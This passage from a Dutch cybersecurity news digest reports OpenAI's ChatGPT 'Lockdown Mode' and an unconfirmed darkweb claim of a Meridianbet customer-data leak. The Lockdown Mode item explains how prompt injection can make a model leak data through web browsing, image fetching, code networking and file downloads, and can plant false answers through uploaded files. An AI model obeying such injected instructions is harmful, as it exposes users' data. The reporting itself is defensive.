Staatssecretaris Van der Burg benadrukt het belang van deze maatregelen: "Logius, en DigiD, zijn een belangrijk deel van onze digitale dienstverlening. Zo wordt DigiD inmiddels door meer dan 16,5 miljoen mensen gebruikt. Het is goed om grip te hebben op de systemen waar Nederlanders dagelijks mee te maken hebben." De Tweede Kamer zal opnieuw worden geïnformeerd wanneer de aanbesteding is toegekend.
Bron: Rijksoverheid
07 juni 2026 | ChatGPT introduceert 'Lockdown Mode' tegen datadiefstal via prompt injection
OpenAI heeft de uitrol van een nieuwe 'Lockdown Mode' voor ChatGPT aangevat, beschikbaar voor in aanmerking komende persoonlijke accounts. Deze functionaliteit is ontworpen om het risico op datadiefstal, dat voortkomt uit aanvallen via prompt injection, te verminderen. De modus is primair bedoeld voor individuen en organisaties die met gevoelige gegevens werken en behoefte hebben aan strengere beveiligingsgaranties. Gebruikers met een Free, Go, Plus, Pro of self-service ChatGPT Business abonnement kunnen van de Lockdown Mode gebruikmaken.
Volgens OpenAI is de Lockdown Mode een optionele, geavanceerde beveiligingsinstelling die de functionaliteiten van tools en mogelijkheden binnen producten van OpenAI, die verbinding kunnen maken met het internet of externe diensten, beperkt. Het hoofddoel is om het risico op datadiefstal te verminderen door uitgaande netwerkverzoeken te limiteren, al gaat dit ten koste van het uitschakelen of beperken van bepaalde nuttige functies.
De nieuwe beveiligingsmaatregelen zijn gericht op het verharden van het aanvalsoppervlak tegen prompt injections, een probleem dat nog steeds als een 'frontier'-uitdaging wordt beschouwd voor alle grote taalmodellen (LLM's). Deze maatregelen bouwen voort op sandboxing en bestaande controles om mechanismen voor datadiefstal via URL's te bestrijden. Het idee is niet om prompt injections volledig te voorkomen, noch verandert de modus de werking van geheugen, bestandsuploads of de mogelijkheid om gesprekken te delen. In plaats daarvan is het doel om potentiële routes waarlangs data kan worden geëxfiltreerd, te elimineren.
Hiertoe schakelt de Lockdown Mode de volgende functies uit:
* Live web browsing, dat wordt beperkt tot toegang tot alleen gecacheerde inhoud.
* Afbeeldingsondersteuning, voor het weergeven van afbeeldingen in reguliere antwoorden of het ophalen van afbeeldingen van het web.
* Canvas networking, dat gebruikers verhindert om door Canvas gegenereerde code toegang tot het netwerk te verlenen.
* Bestandsdownloads, die het downloaden van bestanden voor gegevensanalyse blokkeren.
OpenAI benadrukt dat de functionaliteit niet voor iedereen bedoeld is en merkt op dat Lockdown Mode en Developer Mode niet tegelijkertijd kunnen worden gebruikt; het inschakelen van de ene schakelt de andere uit. Het bedrijf waarschuwt dat de Lockdown Mode het risico op datadiefstal via prompt injection weliswaar aanzienlijk vermindert, maar geen absolute garantie biedt. Risico's kunnen blijven bestaan via ingeschakelde apps, onvoorziene combinaties van mogelijkheden of nieuw ontdekte technieken. Ook voorkomt de modus niet alle andere effecten van aanvallen via prompt injection, zoals onjuiste antwoorden veroorzaakt door kwaadaardige instructies in geüploade bestanden.
De ontwikkeling valt samen met de lancering van een nieuwe functionaliteit voor accountbeheer door OpenAI. Deze stelt gebruikers in staat om actieve sessies in ChatGPT te bekijken en uit te loggen uit individuele of alle sessies, mochten er tekenen van ongeautoriseerde accountactiviteit worden gedetecteerd. De weergegeven sessies omvatten informatie over het apparaat, de gebruikte app, een geschatte locatie, de aanmeldingsdatum en -tijd, of het apparaat als vertrouwd wordt beschouwd en of het de huidige sessie betreft.
Bron: OpenAI
07 juni 2026 | Vermeend datalek bij gokbedrijf Meridianbet treft mogelijk ook Belgische klanten
Uit dagelijkse monitoring van het darkweb is een forumbericht naar voren gekomen waarin een dreigingsactor, bekend onder de naam INF GRUPA, claimt een uitgebreide klantendatabase van het internationale gokbedrijf Meridianbet te hebben bemachtigd. De vermeende dataset zou maar liefst 3,7 miljoen klantrecords omvatten.
Volgens de informatie die op het darkweb is gepubliceerd, zouden de getroffen klanten afkomstig zijn uit een elftal landen. Specifiek wordt België genoemd, naast Servië, Cyprus, Bosnië, Malta, Peru, Brazilië, Colombia, Tanzania, Nigeria en Zuid-Afrika. Dit is van belang, aangezien Meridianbet al geruime tijd actief is op de Belgische gokmarkt en daarvoor over de benodigde vergunningen beschikt. Eind 2025 verkreeg het bedrijf bovendien een Belgische licentie voor online casinoactiviteiten.
Tot op heden is de claim van INF GRUPA niet onafhankelijk bevestigd door Meridianbet, en het bedrijf heeft nog niet gereageerd op de beweringen. Het is dan ook onduidelijk hoeveel Belgische klanten daadwerkelijk door dit vermeende incident zouden zijn getroffen. INF GRUPA is een actor die in het verleden vaker claims heeft geuit, waarvan de volledige bevestiging niet altijd kon worden vastgesteld.
Gebruikers die een account hebben bij Meridianbet, worden geadviseerd extra alert te zijn op mogelijke phishingpogingen die voortvloeien uit dit datalek. Tevens wordt aangeraden om uit voorzorg het wachtwoord van hun account bij Meridianbet te wijzigen.
Bron: Cybercrimeinfo